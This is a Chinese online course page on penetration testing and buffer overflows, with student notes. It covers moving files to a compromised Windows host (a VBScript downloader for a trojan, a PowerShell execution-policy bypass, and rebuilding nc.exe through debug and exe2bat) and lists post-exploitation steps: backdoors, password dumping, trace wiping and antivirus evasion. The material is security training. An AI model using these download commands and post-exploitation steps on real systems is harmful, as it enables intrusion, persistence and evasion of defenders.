默认计划
931人加入学习
(9人评价)
安全测试缓冲区溢出

购买过Kali Linux渗透测试、武官课程包、安全技术会员课程的学员不要再买此课程

价格 ¥ 300.00
该课程属于 高校公益行 | 网络安全实践训练营 请加入后再学习

使用VBScript 传输文件

每一种传输方式 最熟悉场景

VBScript木马

还是需要通过echo吧所有的VBScript的代码指令发送到目标vbs里面 通过vbs执行 通过webhttp协议 下载木马程序 vbs 是windows默认的脚本语言 win7 以前最主要 是 现在增加powrshell

ka

win8 win7 使用powershell 简短的语句实现我们达到的目的

powershell 后缀是ps1

 

debug文件传输 操作很常用 朱啊哟是汇编反汇编 16dump 有默认字节 64k字节

过程 有限制 当文件比较大 使用upx进行压缩

[展开全文]

vbscript            //win7以前的脚本语言

·service apache2 start

netstat -pantu | grep :80

cd /var/www/html

cp /ftphome/whoami.exe

 

Powershell

 

Debug

·汇编、反汇编

·16进制dump工具

·64k字节的传输限制

[展开全文]

缓冲区溢出

  • 当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被”撑爆”,从而覆盖了相邻内存区域的数据;
  • 成功修改内存数据,可造成进程劫持,执行恶意代码,获取服务器控制权等后果

如何发现漏洞

  • 源码审计
  • 逆向工程
  • 模糊测试 
    • 向程序堆找半随机的数据,根据内存变化判断溢出
    • 数据生成器:生成随机,半随机数据
    • 测试工具:识别溢出漏洞

windows缓冲区溢出

FUZZER

  • SLMail 5.5.0 Mail Server
  • ImmunityDebugger_1_85_setup.exe
  • mona.py

  • DEP

  • ASLR

POP3

  • nc 110端口
  • 01.py

未知协议

  • wireshark
  • RFC

重定向数据流

生成shellcode

  • msfpayload

linux缓冲区溢出

CROSSFIRE

多人在线rpg游戏 
1.9.0版本接受入站socket连接时存在缓冲区溢出漏洞

调试工具

edb

选择和修改exp代码

网上公开的exp代码

  • exploit-db
  • securityfocus
  • searchsploit
  • msf
  • 有能力修改exp(python、perl、ruby、从、c++)

避免有害的exp

  • 不同的exp 
    • 不同的系统补丁
    • 软件版本
    • 不同的offset、shellcode
  • 扫描探测目标系统版本,搭建适当的测试环境 
    • 避免一锤子测试

后漏洞利用阶段

  • 上传工具
  • 提权
  • 擦除攻击痕迹
  • 安装后门 
    • 长期控制
    • DUMP密码
    • 内网渗透
  • 后漏洞利用阶段 
    • 最大的挑战——防病毒软件
    • 使用合法的远程控制软件
[展开全文]

vbscript

service apache2 start  #开启apache

cd /var/www/html/

cp 路径+whoami.exe .

将命令写入文件

cscript wget.vbs http://ip/whoami.exe w.exe

powershell

powershell.exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -NoProfile -File wget.ps1

debug

>汇编,反汇编

>16进制dump工具

>限制64k字节

npx -9 nc.exe  #压缩nc文件

wine /usr/share/windows-binaries/exe2bat.exe nc.txt   #转换成二进制文件

将nc.txt中的命令(除倒数两行)复制到命令行执行

debug<123.hex  #debug进行汇编

copy 1.dll nc.exe

 

 

[展开全文]